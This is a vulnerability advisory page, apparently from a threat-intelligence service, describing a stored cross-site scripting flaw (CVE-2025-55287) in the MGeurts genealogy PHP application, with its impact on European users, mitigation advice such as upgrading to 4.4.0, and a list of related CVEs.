CVE-2025-55287: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in MGeurts genealogy
Genealogy is a family tree PHP application. Prior to 4.4.0, Authenticated Stored Cross-Site Scripting (XSS) vulnerability was identified in the Genealogy application. Authenticated attackers could run arbitrary JavaScript in another user’s session, leading to session hijacking, data theft, and UI manipulation. This vulnerability is fixed in 4.4.0.
AI Analysis
Technical Summary
CVE-2025-55287 is a high-severity authenticated stored Cross-Site Scripting (XSS) vulnerability affecting versions of the MGeurts genealogy PHP application prior to 4.4.0. The vulnerability arises from improper neutralization of user-supplied input during web page generation (CWE-79). Specifically, authenticated attackers can inject malicious JavaScript code that is stored persistently within the application and executed in the context of other users’ sessions when they view the affected content. This allows the attacker to hijack user sessions, steal sensitive data, and manipulate the user interface. The vulnerability requires the attacker to have authenticated access, and exploitation involves user interaction, such as another user viewing the injected content. The CVSS 3.0 base score of 8.0 reflects the high impact on confidentiality, integrity, and availability, combined with relatively low attack complexity and no requirement for privileges beyond authentication. The flaw is fixed in version 4.4.0 of the application. No known exploits are currently reported in the wild, but the vulnerability poses a significant risk to organizations using vulnerable versions of the MGeurts genealogy software.
Potential Impact
For European organizations, particularly those involved in genealogy research, family history services, or cultural heritage institutions using the MGeurts genealogy application, this vulnerability could lead to severe consequences. Exploitation could result in unauthorized access to personal and genealogical data, which often includes sensitive personal information protected under GDPR. Session hijacking could allow attackers to impersonate legitimate users, potentially leading to further unauthorized data access or manipulation. UI manipulation could undermine user trust and damage organizational reputation. Given the nature of genealogy data, the breach of confidentiality could have privacy implications for European citizens. Additionally, if the application is integrated with other systems or used in multi-user environments, the scope of impact could extend beyond the genealogy platform itself. The requirement for authentication limits exposure to some extent, but insider threats or compromised credentials could facilitate exploitation.
Mitigation Recommendations
Organizations should immediately upgrade the MGeurts genealogy application to version 4.4.0 or later, where the vulnerability is patched. Until the upgrade is applied, implement strict input validation and output encoding on all user-supplied data within the application to prevent script injection. Employ Content Security Policy (CSP) headers to restrict the execution of unauthorized scripts. Conduct regular audits of user-generated content to detect and remove any malicious scripts. Enforce strong authentication mechanisms and monitor for suspicious login activities to reduce the risk of attacker access. Educate users about the risks of clicking on untrusted links or content within the genealogy platform. Additionally, consider isolating the genealogy application environment and restricting access to trusted users only. Implement web application firewalls (WAF) with rules targeting XSS attack patterns to provide an additional layer of defense.
Affected Countries
Germany, France, United Kingdom, Netherlands, Belgium, Italy, Spain, Sweden
CVE-2025-55287: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in MGeurts genealogy
Description
Genealogy is a family tree PHP application. Prior to 4.4.0, Authenticated Stored Cross-Site Scripting (XSS) vulnerability was identified in the Genealogy application. Authenticated attackers could run arbitrary JavaScript in another user’s session, leading to session hijacking, data theft, and UI manipulation. This vulnerability is fixed in 4.4.0.
AI-Powered Analysis
Technical Analysis
CVE-2025-55287 is a high-severity authenticated stored Cross-Site Scripting (XSS) vulnerability affecting versions of the MGeurts genealogy PHP application prior to 4.4.0. The vulnerability arises from improper neutralization of user-supplied input during web page generation (CWE-79). Specifically, authenticated attackers can inject malicious JavaScript code that is stored persistently within the application and executed in the context of other users’ sessions when they view the affected content. This allows the attacker to hijack user sessions, steal sensitive data, and manipulate the user interface. The vulnerability requires the attacker to have authenticated access, and exploitation involves user interaction, such as another user viewing the injected content. The CVSS 3.0 base score of 8.0 reflects the high impact on confidentiality, integrity, and availability, combined with relatively low attack complexity and no requirement for privileges beyond authentication. The flaw is fixed in version 4.4.0 of the application. No known exploits are currently reported in the wild, but the vulnerability poses a significant risk to organizations using vulnerable versions of the MGeurts genealogy software.
Potential Impact
For European organizations, particularly those involved in genealogy research, family history services, or cultural heritage institutions using the MGeurts genealogy application, this vulnerability could lead to severe consequences. Exploitation could result in unauthorized access to personal and genealogical data, which often includes sensitive personal information protected under GDPR. Session hijacking could allow attackers to impersonate legitimate users, potentially leading to further unauthorized data access or manipulation. UI manipulation could undermine user trust and damage organizational reputation. Given the nature of genealogy data, the breach of confidentiality could have privacy implications for European citizens. Additionally, if the application is integrated with other systems or used in multi-user environments, the scope of impact could extend beyond the genealogy platform itself. The requirement for authentication limits exposure to some extent, but insider threats or compromised credentials could facilitate exploitation.
Mitigation Recommendations
Organizations should immediately upgrade the MGeurts genealogy application to version 4.4.0 or later, where the vulnerability is patched. Until the upgrade is applied, implement strict input validation and output encoding on all user-supplied data within the application to prevent script injection. Employ Content Security Policy (CSP) headers to restrict the execution of unauthorized scripts. Conduct regular audits of user-generated content to detect and remove any malicious scripts. Enforce strong authentication mechanisms and monitor for suspicious login activities to reduce the risk of attacker access. Educate users about the risks of clicking on untrusted links or content within the genealogy platform. Additionally, consider isolating the genealogy application environment and restricting access to trusted users only. Implement web application firewalls (WAF) with rules targeting XSS attack patterns to provide an additional layer of defense.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Data Version
- 5.1
- Assigner Short Name
- GitHub_M
- Date Reserved
- 2025-08-12T16:15:30.237Z
- Cvss Version
- 3.0
- State
- PUBLISHED
Threat ID: 68a35cb2ad5a09ad00b0b5e0
Added to database: 8/18/2025, 5:02:42 PM
Last enriched: 8/18/2025, 5:18:11 PM
Last updated: 8/19/2025, 12:34:27 AM
Views: 3
Related Threats
CVE-2025-3495: CWE-338 Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) in Delta Electronics COMMGR
CriticalCVE-2025-53948: CWE-415 Double Free in Santesoft Sante PACS Server
HighCVE-2025-52584: CWE-122 Heap-based Buffer Overflow in Ashlar-Vellum Cobalt
HighCVE-2025-46269: CWE-122 Heap-based Buffer Overflow in Ashlar-Vellum Cobalt
HighCVE-2025-54862: CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') in Santesoft Sante PACS Server
MediumActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.